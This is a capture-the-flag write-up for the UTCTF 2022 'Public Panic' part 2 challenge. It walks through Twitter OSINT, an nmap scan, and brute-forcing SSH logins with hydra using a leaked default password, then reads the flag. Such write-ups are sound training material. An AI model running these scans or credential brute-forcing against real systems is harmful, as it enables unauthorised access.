Rating:
[Original writeup source](https://barelycompetent.dev/post/ctfs/2022-03-13-utctf/#public-panic-p2)
---
Continuing on from Public Panic PT1, we know the following Twitter web (by inspecting+following the original team's followers and links):
* [Neil Cline](https://twitter.com/NeilCline9)
* [Britt Bryant](https://twitter.com/BrittBryant18)
* [Robyn Swanson](https://twitter.com/RobynSwanson96)
* [Sherman Kern](https://twitter.com/kern_sherman)
* [Craig Wallace](https://twitter.com/CraigWa09526548)
* [Wade Coldwater](https://twitter.com/WadeColdwater)
* [Claude Castillo](https://twitter.com/ClaudeCastill18)
* [Sidney Jaggers](https://twitter.com/JaggersSidney)
* [Misty Booker](https://twitter.com/MistyBooker99)
* [Debby Uselton](https://twitter.com/DebbyUselton)
* [Cliff Shackleford](https://twitter.com/CliffShacklefo1)
From the challenge prompt, we have a new target, which "we're allowed to enumerate". Let's do so:
```text
nmap -sV misc2.utctf.live -p 8622 Desktop
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-13 12:53 EDT
Nmap scan report for misc2.utctf.live (18.205.162.101)
Host is up (0.025s latency).
rDNS record for 18.205.162.101: ec2-18-205-162-101.compute-1.amazonaws.com
PORT STATE SERVICE VERSION
8622/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds
```
So it looks like we need to find SSH creds to log on to this server at port 8622. From the list of twitter accounts above, it happens that in the same tweet/image from the first problem, we also see what looks to be a potential SSH password:
In item 2, "defaultpw5678!" looks like our SSH password. All that's left is to figure out what username to use. This is the part of the challenge that took me the longest. I manually tried various combinations of twitter handles/names/etc. After about 30 minutes, I got sick of that and started making a list of permutations that I would throw at the service with `hydra` (the brute forcing SSH tool).
I asked the challenge author first if this was OK, and they said "Have at it! Feel free to use a script or hydra against this one.". So hydra it is:)
After failing to crack the login with my intial list of usernames based on twitter handles, I tried various combinations of FirstnameLastname, LastnameFirstname, FirstnameLastname(3 chars), etc. None of which worked. After a few hours and suggestions of the author, "common username conventions might help", I decided to look into more standard unix username conventions.
[One of the first Google hits](https://serverfault.com/questions/348912/best-practices-in-username-standards-avoiding-problems) seemed to mention that **{firstInitial}{lastname}** was the way.
Using this convention with the list of users above yields the following account list:
```text
wcoldwater
ccastillo
cshackleford
duselton
sjaggers
mbooker
ncline
skern
rswanson
bbryant
cwallace
```
... which we can then feed to hydra with our password, to brute force the service:
```bash
hydra -t 2 -L accounts.txt -p defaultpw5678! ssh://misc2.utctf.live:8622
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-13 13:02:32
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 2 tasks per 1 server, overall 2 tasks, 11 login tries (l:11/p:1), ~6 tries per task
[DATA] attacking ssh://misc2.utctf.live:8622/
[8622][ssh] host: misc2.utctf.live login: cshackleford password: defaultpw5678!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-13 13:03:15
```
Boom, we have the login! `[8622][ssh] host: misc2.utctf.live login: cshackleford password: defaultpw5678!` tells us we can login with `cshackleford` and the password.
Doing so gets us the flag:
```bash
ssh -p 8622 [email protected]
[email protected]'s password:
# ...
cshackleford@3e64db1cbff7:~$ cat flag.txt
utflag{conventions_knowledge_for_the_win}
```
Flag is `utflag{conventions_knowledge_for_the_win}`.
_(Shoutout to Rob H., the challenge creator, for being a standup person and not being a total dick when you ask them something, really appreciate it)_.
